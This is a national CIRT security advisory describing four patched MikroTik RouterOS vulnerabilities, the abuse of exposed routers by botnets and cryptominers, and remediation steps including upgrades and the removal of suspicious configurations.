Ref# AL2021_53 | Date: Dec 10th 2021

---

Over 300,000 Mikro Tik devices were discovered to be susceptible to multiple remotely exploitable security vulnerabilities that have since been patched by the organization.

The devices vulnerable to the attack must have RouterOS version 6.45.6 or older and their WinBox protocol exposed to the Internet.

Summary

Mikro Tik devices have become a favorite among malicious threat actors since the devices are considered both powerful and highly vulnerable. These devices have been used by these threat actors for almost everything from distributed denial of service (DDoS) attacks, command-and-control (C2), traffic tunneling, etc.

MikroTik devices are a tempting target because there are more than two million of them deployed worldwide, posing a huge attack surface that can be leveraged by malicious threat actors to organize a range of attacks.

How it Works

Researchers have produced a list of four vulnerabilities discovered over the last three years which enable full takeover of Mikro Tik devices and are still these vulnerabilities are:

• CVE-2019-3977 (CVSS score: 7.5) – MikroTik RouterOS insufficient validation of upgrade package”s origin, allowing a reset of all usernames and passwords
• CVE-2019-3978 (CVSS score: 7.5) – MikroTik RouterOS insufficient protections of a critical resource, leading to cache poisoning
• CVE-2018-14847 (CVSS score: 9.1) – MikroTik RouterOS directory traversal vulnerability in the WinBox interface
• CVE-2018-7445 (CVSS score: 9.8) – MikroTik RouterOS SMB buffer overflow vulnerability

In addition to these vulnerabilities, it was also discovered that 20,000 Mikro Tik devices injected cryptocurrency mining scripts into web pages visited by users.

The compromised routers have the ability to inject malicious content, tunnel, copy, or reroute traffic which can all be used in a variety of highly destructive ways. DNS poisoning could redirect a remote worker”s connection to a malicious website or introduce a machine-in-the-middle.

An attacker could also use well-known techniques and tools to potentially capture sensitive information such as stealing MFA credentials from a remote user using SMS over WiFi. As with previous attacks, enterprise traffic could be tunneled to another location or malicious content injected into valid traffic.

Remediation

1. Upgrade the device OS version to v6.48.6 or v6.49.2

2. Use strong passwords,

3. Avoid remote access, but if this is necessary, do so through a virtual private network (VPN) service and inspect your RouterOS configuration for unknown settings.

Configurations to look out for and remove:

• System -> Scheduler rules that execute a Fetch script. Remove these.
• IP -> Socks proxy. If you don”t use this feature or don”t know what it does, it must be disabled.
• L2TP client named “lvpn” or any L2TP client that you don”t recognize. l Input firewall rule that allows access for port 5678.

For more information, kindly visit the following URL:

https://blog.mikrotik.com/security/meris-botnet.html

The Guyana National CIRT advises users and administrators review this alert and apply it where necessary.
PDF Download: MikroTik Devices Found Vulnerable to Remote Hacking Bugs.pdf

References

• Lakshmanan, Ravie. (9th December, 2021). Over 300,000 MikroTik Devices Found Vulnerable to Remote Hacking Bugs. Retrieved from The Hacker News:
  https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html
   
• Toulas, Bill. (9th December, 2021). Hundreds of thousands of MikroTik devices still vulnerable to botnets. Retrieved from Bleeping Computer:

          https://www.bleepingcomputer.com/news/security/hundreds-of-thousands-of- mikrotik-devices-still-vulnerable-to-botnets/